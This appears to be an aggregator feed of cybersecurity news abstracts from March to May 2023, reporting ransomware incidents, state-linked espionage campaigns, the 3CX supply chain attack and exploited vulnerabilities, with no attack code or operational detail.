Iranian nation-state groups have now joined financially motivated actors in actively exploiting a critical flaw in PaperCut print management software, Microsoft disclosed over the weekend. The tech giant's threat intelligence team said it observed both Mango Sandstorm (Mercury) and Mint Sandstorm (Phosphorus) weaponizing CVE-2023-27350 in their operations to achieve initial access. "This activity shows Mint Sandstorm's continued ability to rapidly incorporate [proof-of-concept] exploits into their operations," Microsoft said in a series of tweets. On the other hand, CVE-2023-27350 exploitation activity associated with Mango Sandstorm is said to be on the lower end of the spectrum, with the state-sponsored group "using tools from prior intrusions to connect to their C2 infrastructure." It's worth noting that Mango Sandstorm is linked to Iran's Ministry of Intelligence and Security (MOIS) and Mint Sandstorm is associated with the IslamicThe Hacker News
May 8, 2023
Cyberattack at Hong Kong healthcare group may have exposed 100,000 patients’ data Full Text
Abstract
OT&P Healthcare CEO Robin Green on Monday said the cyberattack took place within the clinic’s management and operating system. “That system holds both patient identity and medical records. We have no idea … how much data was taken,” he said.Cyware
May 08, 2023
CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine Full Text
Abstract
An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA). The emails, per the agency , are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file. The JavaScript code is then used to launch an executable that paves for the execution of the SmokeLoader malware . SmokeLoader, first detected in 2011, is a loader whose main objective is to download or load a stealthier or more effective malware onto infected systems. CERT-UA attributed the activity to a threat actor it calls UAC-0006 and characterized it as a financially motivated operation carried out with the goal of stealing credentials and making unauthorized fund transfers. In a related advisory, Ukraine's cybersecurity authority also revealed details of destructive attacks orchThe Hacker News
May 6, 2023
Drone Goggles Maker Orqa Hit with ‘Time-bomb’ Ransomware Attack Full Text
Abstract
Orqa, a maker of FPV drone racing goggles, claimed that a contractor introduced code into the firmware of the devices, designed to brick them as a time bomb. Findings say that the contractor had been in business relations with Orqa for several years and had waited for the code bomb to detonate ... Read MoreCyware
May 5, 2023
Pro-Russian Hackers Claim Downing of French Senate Website Full Text
Abstract
“Access to the site has been disrupted since this morning,” the upper house of Parliament said on Twitter shortly before midday, saying a team was busy fixing the problem.Cyware
May 05, 2023
ALPHV gang claims ransomware attack on Constellation Software Full Text
Abstract
Canadian diversified software company Constellation Software confirmed on Thursday that some of its systems were breached by threat actors who also stole personal information and business data.BleepingComputer
May 4, 2023
Researchers Observe a Spike in Attacks Against TBK DVR Camera Devices Full Text
Abstract
FortiGuard Labs warned of attackers exploiting a five-year-old authentication bypass vulnerability in TBK DVR devices, that has over 600,000 cameras and 50,000 recorders installed globally, providing a significant threat to camera video feeds. A remote attacker can also exploit the flaw to bypass a ... Read MoreCyware
May 04, 2023
Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts Full Text
Abstract
Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023. The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts. "Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said . "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware." The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in VietnaThe Hacker News
May 2, 2023
Earth Longzhi Returns With New Tricks to Target Organizations in Taiwan, Thailand, the Philippines, and Fiji Full Text
Abstract
The campaign, which came after months of inactivity, was found to abuse a Windows Defender executable for DLL sideloading and exploit a vulnerable driver, zamguard.sys, to disable security products through a bring-your-own-vulnerable-driver attack.Cyware
May 2, 2023
Bluefield University, BridgeValley Community and Technical College, and Penncrest School District Suffer Cyberattacks Full Text
Abstract
This week, thousands of students at several U.S. schools, such as Bluefield University, BridgeValley Community and Technical College, Penncrest School District, and Truman State University, are feeling the impact of ransomware and other cyberattacks.Cyware
May 2, 2023
Fortinet warns of a spike in attacks against TBK DVR devices Full Text
Abstract
FortiGuard Labs researchers are warning of a spike in malicious attacks targeting TBK DVR devices. Threat actors are attempting to exploit a five-year-old authentication bypass issue, tracked as CVE-2018-9995 (CVSS score of 9.8), in TBK DVR devices.Cyware
May 2, 2023
Australian Law Firm HWL Ebsworth Hit by Russian-linked Ransomware Attack Full Text
Abstract
Late last week, the ALPHV/Blackcat ransomware group posted on its website that 4TB of company data had been hacked, including employee CVs, IDs, financial reports, accounting data, client documentation, credit card data, and a complete network map.Cyware
May 1, 2023
Nashua School District hit by ‘sophisticated’ cyberattack Full Text
Abstract
"We are working diligently to investigate the incident, confirm its impact on our systems, and securely restore functionality to our environment as soon as possible," the district said in a statement.Cyware
May 1, 2023
German IT provider Bitmarck hit by cyberattack Full Text
Abstract
Bitmarck, one of the largest IT service providers for social insurance carriers in Germany, announced yesterday that it has suffered a cyber attack. The German IT service provider Bitmarck announced on April 30 it had taken all its systems offline...Security Affairs
April 28, 2023
UK school hit by ransomware attack Full Text
Abstract
A school in Wiltshire was hit by a ransomware attack last weekend. Hardenhuish School, a mixed secondary academy in Chippenham, sent texts to parents and guardians of its 1,623 pupils notifying them of the attack.Cyware
April 28, 2023
South Carolina’s Spartanburg County Suffers Ransomware Attack Full Text
Abstract
A ransomware attack has been reported in Spartanburg County. WYFF News 4 reached out to Spartanburg County officials and the South Carolina Judicial Branch after hearing about a possible computer issue.Cyware
April 28, 2023
Tonto Team Uses Anti-Malware File to Launch Attacks on South Korean Institutions Full Text
Abstract
South Korean education, construction, diplomatic, and political institutions are at the receiving end of new attacks perpetrated by a China-aligned threat actor known as the Tonto Team . "Recent cases have revealed that the group is using a file related to anti-malware products to ultimately execute their malicious attacks," the AhnLab Security Emergency Response Center (ASEC) said in a report published this week. Tonto Team, active since at least 2009, has a track record of targeting various sectors across Asia and Eastern Europe. Earlier this year, the group was attributed to an unsuccessful phishing attack on cybersecurity company Group-IB. The attack sequence discovered by ASEC starts with a Microsoft Compiled HTML Help (.CHM) file that executes a binary file to side-load a malicious DLL file (slc.dll) and launch ReVBShell , an open source VBScript backdoor also put to use by another Chinese threat actor called Tick . ReVBShell is subsequently leveraged to doThe Hacker News
April 27, 2023
Paperbug Attack: New Politically-Motivated Surveillance Campaign in Tajikistan Full Text
Abstract
A little-known Russian-speaking cyber-espionage group has been linked to a new politically-motivated surveillance campaign targeting high-ranking government officials, telecom services, and public service infrastructures in Tajikistan. The intrusion set, dubbed Paperbug by Swiss cybersecurity company PRODAFT, has been attributed to a threat actor known as Nomadic Octopus (aka DustSquad). "The types of compromised machines range from individuals' computers to [operational technology] devices," PRODAFT said in a deep dive technical report shared with The Hacker News. "These targets make operation 'Paperbug' intelligence-driven." The ultimate motive behind the attacks is unclear at this stage, but the cybersecurity firm has raised the possibility that it could be the work of opposition forces within the country or, alternatively, an intelligence-gathering mission carried out by Russia or China. Nomadic Octopus first came to light in October 2018 wThe Hacker News
April 26, 2023
Pro-Russia hacking group executed a disruptive attack against a Canadian gas pipeline Full Text
Abstract
Pro-Russia hacking group Zarya caused a cybersecurity incident at a Canadian gas pipeline, the critical infrastructure sector is on alert. A Canadian gas pipeline suffered a cyber security incident, Canada’s top cyber official and Pro-Russia hacking...Security Affairs
April 25, 2023
Iranian Hackers Launch Sophisticated Attacks Targeting Israel with PowerLess Backdoor Full Text
Abstract
An Iranian nation-state threat actor has been linked to a new wave of phishing attacks targeting Israel that's designed to deploy an updated version of a Windows backdoor called PowerLess . Cybersecurity firm Check Point is tracking the activity cluster under its mythical creature handle Educated Manticore , which exhibits "strong overlaps" with a hacking crew known as APT35, Charming Kitten, Cobalt Illusion, ITG18, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda. "Like many other actors, Educated Manticore has adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains," the Israeli company said in a technical report published today. Active since at least 2011, APT35 has cast a wide net of targets by leveraging fake social media personas , spear-phishing techniques , and N-day vulnerabilities in internet-exposed applications to gain initial access and drop various payloads, includiThe Hacker News
April 24, 2023
New Blind Eagle Attack Chain Discovered Full Text
Abstract
The Blind Eagle cyberespionage group was identified as the source of a new multi-stage attack chain that ultimately results in the deployment of NjRAT on compromised systems. In this attack campaign, Blind Eagle leverages social engineering, custom malware, and spear-phishing attacks. Therefore, up ... Read MoreCyware
April 23, 2023
Health insurer Point32Health suffered a ransomware attack Full Text
Abstract
Non-profit health insurer Point32Health suffered a ransomware attack and has taken systems offline in response to the incident. Non-profit health insurer Point32Health has taken systems offline in response to a ransomware attack that took place on April...Security Affairs
April 22, 2023
Lazarus X_TRADER Hack Impacts Critical Infrastructure Beyond 3CX Breach Full Text
Abstract
Lazarus, the prolific North Korean hacking group behind the cascading supply chain attack targeting 3CX , also breached two critical infrastructure organizations in the power and energy sector and two other businesses involved in financial trading using the trojanized X_TRADER application. The new findings, which come courtesy of Symantec's Threat Hunter Team , confirm earlier suspicions that the X_TRADER application compromise affected more organizations than 3CX. The names of the organizations were not revealed. Eric Chien, director of security response at Broadcom-owned Symantec, told The Hacker News in a statement that the attacks took place between September 2022 and November 2022. "The impact from these infections is unknown at this time – more investigation is required and is on-going," Chien said, adding it's possible that there's "likely more to this story and possibly even other packages that are trojanized." The development comes as MaThe Hacker News
April 21, 2023
Pro-Russia hackers launched a massive attack against the EUROCONTROL agency Full Text
Abstract
Pro-Russia hackers KillNet launched a massive DDoS attack against Europe’s air-traffic agency EUROCONTROL. Europe’s air-traffic control agency EUROCONTROL announced that it was under attack from pro-Russian hackers. The European Organisation...Security Affairs
April 21, 2023
N.K. Hackers Employ Matryoshka Doll-Style Cascading Supply Chain Attack on 3CX Full Text
Abstract
The supply chain attack targeting 3CX was the result of a prior supply chain compromise associated with a different company, demonstrating a new level of sophistication with North Korean threat actors. Google-owned Mandiant, which is tracking the attack event under the moniker UNC4736 , said the incident marks the first time it has seen a "software supply chain attack lead to another software supply chain attack." The Matryoshka doll-style cascading attack against 3CX first came to light on March 29, 2023, when it emerged that Windows and macOS versions of its communication software were trojanized to deliver a C/C++-based data miner named ICONIC Stealer by means of a downloader, SUDDENICON, that used icon files hosted on GitHub to extract the server containing the stealer. "The malicious application next attempts to steal sensitive information from the victim user's web browser," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) saidThe Hacker News
April 20, 2023
Daggerfly Cyberattack Campaign Hits African Telecom Services Providers Full Text
Abstract
Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022. The intrusions have been pinned on a hacking crew tracked by Symantec as Daggerfly , and which is also tracked by the broader cybersecurity community as Bronze Highland and Evasive Panda. The campaign makes use of "previously unseen plugins from the MgBot malware framework," the cybersecurity company said in a report shared with The Hacker News. "The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software." Daggerfly's use of the MgBot loader (aka BLame or MgmBot) was spotlighted by Malwarebytes in July 2020 as part of phishing attacks aimed at Indian government personnel and individuals in Hong Kong. According to a profile published by Secureworks, the threat actor uses spear-phishing as an initial infection vector to drop MgBot as well as otherThe Hacker News
April 19, 2023
Blind Eagle Cyber Espionage Group Strikes Again: New Attack Chain Uncovered Full Text
Abstract
The cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems. "The group is known for using a variety of sophisticated attack techniques, including custom malware, social engineering tactics, and spear-phishing attacks," ThreatMon said in a Tuesday report. Blind Eagle, also referred to as APT-C-36, is a suspected Spanish-speaking group that chiefly strikes private and public sector entities in Colombian. Attacks orchestrated by the group have also targeted Ecuador, Chile, and Spain. Infection chains documented by Check Point and BlackBerry this year have revealed the use of spear-phishing lures to deliver commodity malware families like BitRAT, AsyncRAT, and in-memory Python loaders capable of launching a Meterpreter payload. The latest discovery from ThreatMon entails the use of a JavaScript downloader to execute a PowerShell script hostedThe Hacker News
April 17, 2023
German Arms Manufacturer Rheinmetall Targeted in Cyberattack Full Text
Abstract
Over the weekend, Rheinmetall, a leading German armaments and technology company, was the victim of a cyberattack that targeted all three of its divisions. However, company officials have stated that the attack did not impact operations.Cyware
April 17, 2023
NCR Says it was hit by BlackCat Ransomware Attack Full Text
Abstract
NCR is suffering an outage on its Aloha point of sale (PoS) platform since Wednesday after it was hit by a ransomware attack conducted by the BlackCat/ALPHV ransomware group.Cyware
April 16, 2023
Remcos RAT campaign targets US accounting and tax return preparation firms Full Text
Abstract
Microsoft warns of a new Remcos RAT campaign targeting US accounting and tax return preparation firms ahead of Tax Day. Ahead of the U.S. Tax Day, Microsoft has observed a new Remcos RAT campaign targeting US accounting and tax return preparation...Security Affairs
April 15, 2023
Forensic Analysis Confirms Involvement of North Korean Attackers in 3CX Supply Chain Attack Full Text
Abstract
3CX confirmed that the software supply chain attack was the work of a North Korean hacker group, UNC4736. The group used the Taxhaul and Simplesea malware for infecting Windows and macOS, respectively. Attackers used Taxhaul (or TxRLoader) to target Windows machines, which was further used to deplo ... Read MoreCyware
April 14, 2023
Russia-Linked Hackers Launches Espionage Attacks on Foreign Diplomatic Entities Full Text
Abstract
The Russia-linked APT29 (aka Cozy Bear) threat actor has been attributed to an ongoing cyber espionage campaign targeting foreign ministries and diplomatic entities located in NATO member states, the European Union, and Africa. According to Poland's Military Counterintelligence Service and the CERT Polska team, the observed activity shares tactical overlaps with a cluster tracked by Microsoft as Nobelium , which is known for its high-profile attack on SolarWinds in 2020. Nobelium's operations have been attributed to Russia's Foreign Intelligence Service ( SVR ), an organization that's tasked with protecting "individuals, society, and the state from foreign threats." That said, the campaign represents an evolution of the Kremlin-backed hacking group's tactics, indicating persistent attempts at improving its cyber weaponry to infiltrate victim systems for intelligence gathering. "New tools were used at the same time and independently of eacThe Hacker News
April 14, 2023
A cyberattack on the Cornwall Community Hospital in Ontario is causing treatment delays Full Text
Abstract
The Cornwall Community Hospital in Ontario, Canada, is under a cyber attack that is causing delays to scheduled and non-urgent care. A cyberattack on the Cornwall Community Hospital in Ontario, Canada, is causing delays to scheduled and non-urgent...Security Affairs
April 12, 2023
North Korean Hackers Uncovered as Mastermind in 3CX Supply Chain Attack Full Text
Abstract
Enterprise communications service provider 3CX confirmed that the supply chain attack targeting its desktop application for Windows and macOS was the handiwork of a threat actor with North Korean nexus. The findings are the result of an interim assessment conducted by Google-owned Mandiant, whose services were enlisted after the intrusion came to light late last month. The threat intelligence and incident response unit is tracking the activity under its uncategorized moniker UNC4736 . It's worth noting that cybersecurity firm CrowdStrike has attributed the attack to a Lazarus sub-group dubbed Labyrinth Chollima, citing tactical overlaps. The attack chain , based on analyses from multiple security vendors, entailed the use of DLL side-loading techniques to load an information stealer known as ICONIC Stealer, followed by a second-stage called Gopuram in selective attacks aimed at crypto companies. Mandiant's forensic investigation has now revealed that the threat actoThe Hacker News
April 11, 2023
A cyber attack hit the water controllers for irrigating fields in the Jordan Valley Full Text
Abstract
A cyber attack paralyzed the water controllers for irrigating fields in the Jordan Valley that are operated by the Galil Sewage Corporation. A cyberattack blocked several controllers for irrigating fields in the Jordan Valley. The systems operated...Security Affairs
April 10, 2023
Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign Full Text
Abstract
Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017 . The massive campaign, per GoDaddy's Sucuri, "leverages all known and recently discovered theme and plugin vulnerabilities" to breach WordPress sites. The attacks are known to play out in waves once every few weeks. "This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites," security researcher Denis Sinegubko said . The websites include fake tech support , fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to 'Please Allow to verify, that you are not a robot,' thereby enabling the actors to send spam ads. The report builds on recent findings from Doctor Web, which detailed a Linux malware family thThe Hacker News
April 08, 2023
Taiwanese PC Company MSI Falls Victim to Ransomware Attack Full Text
Abstract
Taiwanese PC company MSI (short for Micro-Star International) officially confirmed it was the victim of a cyber attack on its systems. The company said it "promptly" initiated incident response and recovery measures after detecting "network anomalies." It also said it alerted law enforcement agencies of the matter. That said, MSI did not disclose any specifics about when the attack took place and if it entailed the exfiltration of any proprietary information, including source code. "Currently, the affected systems have gradually resumed normal operations, with no significant impact on financial business," the company said in a brief notice shared on Friday. In a regulatory filing with the Taiwan Stock Exchange, it said that it's setting up enhanced controls of its network and infrastructure to ensure the security of data. MSI is further urging users to obtain firmware/BIOS updates only from its official website, and refrain from downloadingThe Hacker News
April 8, 2023
Color1337: Linux Cryptomining Attack Campaign Used uhQCCSpB Bot Full Text
Abstract
The attackers use a bot called uhQCCSpB that installs and launches a Monero miner on the infected machine. After killing all other miners on the device, the attacker uses two different strategies to maximize access to the compromised Linux machine.Cyware
April 08, 2023
Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise Full Text
Abstract
The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation. That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed DEV-1084 . "While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation," the tech giant revealed Friday. MuddyWater is the name assigned to an Iran-based actor that the U.S. government has publicly connected to the country's Ministry of Intelligence and Security (MOIS). It's been known to be active since at least 2017. It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster,The Hacker News
April 8, 2023
Belgium’s Herselt Municipality Hit by Cyberattack Full Text
Abstract
The cyberattack was detected on Friday evening (07-04-2023), and security measures were immediately heightened. Currently, experts are combing through the municipality’s servers to determine whether any sensitive information has been accessed.Cyware
April 6, 2023
Money Message ransomware group claims to have hacked IT giant MSI Full Text
Abstract
Ransomware gang Money Message claims to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International)....Security Affairs
April 6, 2023
Update: 3CX makes progress in restoring Windows app from state-linked supply chain attack Full Text
Abstract
The business communications company restored its Windows Electron app, making progress in its ongoing recovery from a recent supply chain attack, CEO Nick Galea said in a forum post on Tuesday.Cyware
April 5, 2023
New Proxyjacking Attack Exploits Log4j for Initial Access Full Text
Abstract
Researchers at Sysdig highlight that the new Proxyjacking attack, which is much like cryptojacking, is abusing the infamous Log4j vulnerability to gain initial access to victims’ systems. On a broader scale, researchers note that a modest compromise of 100 IPs can enable attackers to make a profit ... Read MoreCyware
April 5, 2023
Exploited Elementor Pro Plugin Under Attack; Affects Over 11 Million Sites Full Text
Abstract
A security vulnerability in the Elementor Pro website builder plugin for WordPress is under active exploitation by a threat actor. An authenticated user can take advantage of this to take full control over a WordPress site having WooCommerce enabled. The bug in the plugin, roughly deployed on over ... Read MoreCyware
April 05, 2023
Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks Full Text
Abstract
A North Korean government-backed threat actor has been linked to attacks targeting government and military personnel, think tanks, policy makers, academics, and researchers in South Korea and the U.S. Google's Threat Analysis Group (TAG) is tracking the cluster under the name ARCHIPELAGO , which it said is a subset of another threat group tracked by Mandiant under the name APT43 . The tech giant said it began monitoring the hacking crew in 2012, adding it has "observed the group target individuals with expertise in North Korea policy issues such as sanctions, human rights, and non-proliferation issues." The priorities of APT43, and by extension ARCHIPELAGO, are said to align with North Korea's Reconnaissance General Bureau (RGB), the primary foreign intelligence service, suggesting overlaps with a group broadly known as Kimsuky . Attack chains mounted by ARCHIPELAGO involve the use of phishing emails containing malicious links that, when clicked by the reciThe Hacker News
April 04, 2023
Arid Viper Hacking Group Using Upgraded Malware in Middle East Cyber Attacks Full Text
Abstract
The threat actor known as Arid Viper has been observed using refreshed variants of its malware toolkit in its attacks targeting Palestinian entities since September 2022. Symantec, which is tracking the group under its insect-themed moniker Mantis, said the adversary is "going to great lengths to maintain a persistent presence on targeted networks." Also known by the names APT-C-23 and Desert Falcon , the hacking group has been linked to attacks aimed at Palestine and the Middle East at least since 2014. Mantis has used an arsenal of homemade malware tools such as ViperRat , FrozenCell (aka VolatileVenom), and Micropsia to execute and conceal its campaigns across Windows, Android, and iOS platforms. The threat actors are believed to be native Arabic speakers and based in Palestine, Egypt, and Turkey, according to a report published by Kaspersky in February 2015. Prior public reporting has also tied the group to the cyber warfare division of Hamas. In ApriThe Hacker News
April 04, 2023
Cryptocurrency Companies Targeted in Sophisticated 3CX Supply Chain Attack Full Text
Abstract
The adversary behind the supply chain attack targeting 3CX deployed a second-stage implant specifically singling out a small number of cryptocurrency companies. Russian cybersecurity firm Kaspersky, which has been internally tracking the versatile backdoor under the name Gopuram since 2020, said it observed an increase in the number of infections in March 2023 coinciding with the 3CX breach. Gopuram's primary function is to connect to a command-and-control (C2) server and await further instructions that allow the attackers to interact with the victim's file system, create processes, and launch as many as eight in-memory modules. The backdoor's links to North Korea stem from the fact that it "co-existed on victim machines with AppleJeus , a backdoor attributed to the Korean-speaking threat actor Lazarus," detailing an attack on an unnamed crypto firm located in Southeast Asia in 2020. The targeting of cryptocurrency companies is another telltale sign ofThe Hacker News
April 3, 2023
UK outsourcing services provider Capita suffered a cyber incident Full Text
Abstract
UK outsourcing services provider Capita confirmed that the outage suffered on Friday was caused by a cyberattack. Capita, the UK outsourcing giant, confirmed that its staff was locked out of their accounts on Friday after a cyber incident. Capita...Security Affairs
April 3, 2023
Mustang Panda Cyberespionage Strikes Over 200 Targets Full Text
Abstract
Researchers discovered that a series of cyberespionage attacks launched by the subgroups of Earth Preta APT has affected over 200 organizations. While part of these subgroups is focused on stealing intellectual property and business information, others target government and diplomatic entities.Cyware
March 30, 2023
3CX voice and video conferencing software victim of a supply chain attack Full Text
Abstract
Popular voice and video conferencing software 3CX was the victim of a supply chain attack, SentinelOne researchers reported. As of Mar 22, 2023, SentinelOne observed a spike in behavioral detections of the 3CXDesktopApp, which is a popular voice and video...Security Affairs
March 30, 2023
3CX Desktop App Supply Chain Attack Leaves Millions at Risk - Urgent Update on the Way! Full Text
Abstract
3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers. "The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said . The cybersecurity firm is tracking the activity under the name SmoothOperator , stating the threat actor registered a massive attack infrastructure as far back as February 2022. There are indications that the attack may have commenced around March 22, 2023. 3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American ExpresThe Hacker News
March 29, 2023
Clipper attacks use Trojanized TOR Browser installers Full Text
Abstract
Researchers discovered malware-laced installers for the TOR browser that is spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading a clipper malware in Russia...Security Affairs
March 29, 2023
Google Found Two Spyware Campaigns Targeting Apple and Android Devices Full Text
Abstract
The company did not reveal the spyware vendors involved but said one of the campaigns used a link directing targets to a landing page identical to one Google revealed in November 2022 from Spanish spyware firm Variston IT.Cyware
March 28, 2023
Lumen Technologies hit with two separate security incidents Full Text
Abstract
The company has notified law enforcement and is working with outside firms to contain the incidents, according to the filing. It has begun business continuity efforts to restore functionality to its customers’ systems.Cyware
March 28, 2023
Telecom giant Lumen suffered a ransomware attack and disclose a second incident Full Text
Abstract
Telecommunications giant Lumen Technologies discovered two cybersecurity incidents, including a ransomware attack. In a filing to the Securities and Exchange Commission, on March 27, 2023, Lumen announced two cybersecurity incidents. One of the incidents...Security Affairs
March 27, 2023
Operation Tainted Love: New Cyberespionage Campaign by Chinese Full Text
Abstract
A Chinese cyber-espionage campaign, named Operation Tainted Love—associated with Operation Soft Cell—has been found hitting telecommunications providers in the Middle East since Q1 2023. Operation Soft Cell relies heavily on a custom credential theft malware, mim221.Cyware
March 27, 2023
Hackers Attack Wisconsin Court System Computer Network Full Text
Abstract
The attack has not resulted in the breach of any data and court operations are continuing as usual statewide, state Supreme Court Chief Justice Annette Ziegler said in a statement.Cyware
March 26, 2023
Vice Society claims attack on Puerto Rico Aqueduct and Sewer Authority Full Text
Abstract
Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyber attack with the help of the FBI and US CISA. The Puerto Rico Aqueduct and Sewer Authority (PRASA) is investigating a cyberattack that last week hit the agency. The agency quickly...Security Affairs
March 24, 2023
City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day Full Text
Abstract
Clop ransomware gang added the City of Toronto to the list of its victims, it is another organization compromised by exploiting GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak...Security Affairs
March 24, 2023
City of Toronto and Financing Firm Investissement Québec Confirm Being Hit by Ransomware Attack Full Text
Abstract
“Today, the City of Toronto has confirmed that unauthorized access to City data did occur through a third party vendor. The access is limited to files that were unable to be processed through the third-party secure file transfer system,” it said.Cyware
March 23, 2023
Skylink hit by hacker attack Full Text
Abstract
M7 Group’s Czech and Slovak operator Skylink has reportedly fallen victim to a hacker attack. Skylink offers DTH and internet TV services in the Czech Republic and Slovakia.Cyware
March 20, 2023
TeamTNT Allegedly Connected to SCARLETEEL Decoy Attack Full Text
Abstract
The SCARLETEEL sophisticated hacking operation, which targets Kubernetes hosted on Amazon to steal confidential proprietary data, also suspect to have a TeamTNT touch. Despite all the similarities, researchers could not connect the two malware with full confidence. According to them, it is possible ... Read MoreCyware
March 20, 2023
Play ransomware gang hit Dutch shipping firm Royal Dirkzwager Full Text
Abstract
Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack, the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager is specialized...Security Affairs
March 16, 2023
Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency Full Text
Abstract
Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation...Security Affairs
March 16, 2023
Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency Full Text
Abstract
Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S. The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC). "Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server," the agencies said . The indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023. Tracked as CVE-2019-18935 (CVSS score: 9.8), the issue relates to a .NET deserialization vulnerability affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could lead to remote code execThe Hacker News
March 15, 2023
Ring Denies Falling Victim to Ransomware Attack Full Text
Abstract
On Monday, the cybergang behind the Alphv ransomware added an entry to their leaks site claiming they breached Ring and threatening to release data supposedly stolen from the company.Cyware
March 15, 2023
YoroTrooper Espionage Campaigns Targeting CIS Countries, Embassies, and EU Healthcare Agency Full Text
Abstract
YoroTrooper’s main tools include Python-based, custom-built, and open-source information stealers, such as the Stink stealer wrapped into executables via the Nuitka framework and PyInstaller.Cyware
March 14, 2023
Hospital in Brussels latest victim in spate of European healthcare cyberattacks Full Text
Abstract
Ambulances were diverted from the Centre Hospitalier Universitaire (CHU) Saint-Pierre this weekend following the attack in the early hours of Friday morning. Details about the attack and the perpetrators have not yet been disclosed.Cyware
March 14, 2023
Advanced actor targets Fortinet FortiOS in attacks on govt entities Full Text
Abstract
An unknown threat actor is targeting Government entities and large organizations by exploiting a security flaw in Fortinet FortiOS. Fortinet researchers are warning of an advanced threat actor and is targeting governmental or government-related entities. The...Security Affairs
March 13, 2023
Large-scale Cyber Attack Hijacks East Asian Websites for Adult Content Redirects Full Text
Abstract
A widespread malicious cyber operation has hijacked thousands of websites aimed at East Asian audiences to redirect visitors to adult-themed content since early September 2022. The ongoing campaign entails injecting malicious JavaScript code to the hacked websites, often connecting to the target web server using legitimate FTP credentials the threat actor previously obtained via an unknown method. "In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking," Wiz said in a report published this month. The fact that the breached websites – owned by both small firms and multinational corporations – utilize different tech stacks and hosting service providers has made it difficult to trace a common attack vector, the cloud security company noted. That having said, one of the common denominators between the websites is that a majority of them are either hosted in China or hosted inThe Hacker News
March 13, 2023
Estonian official says parliamentary elections were targeted by cyberattacks Full Text
Abstract
Gert Auväärt, head of the National Cyber Security Centre-Estonia (NCSC-EE), told The Record that his team had been in a “heightened awareness level for two weeks” during the campaign, and that attempts to enter the electoral system were unsuccessful.Cyware
March 13, 2023
KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets Full Text
Abstract
The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information. The threat actor is suspected to be of Asia-Pacific origin and has been active since at least mid-2021, with an increased tempo observed in 2022. "The latest attacks, which took place in February 2023, were almost identical to previous attacks," Dutch cybersecurity company EclecticIQ disclosed in a new report published last week. "The main difference in the February campaign is that the malware's obfuscation routine has improved to better evade anti-malware measures." The attacks play out in the form of social engineering lures thatThe Hacker News
March 08, 2023
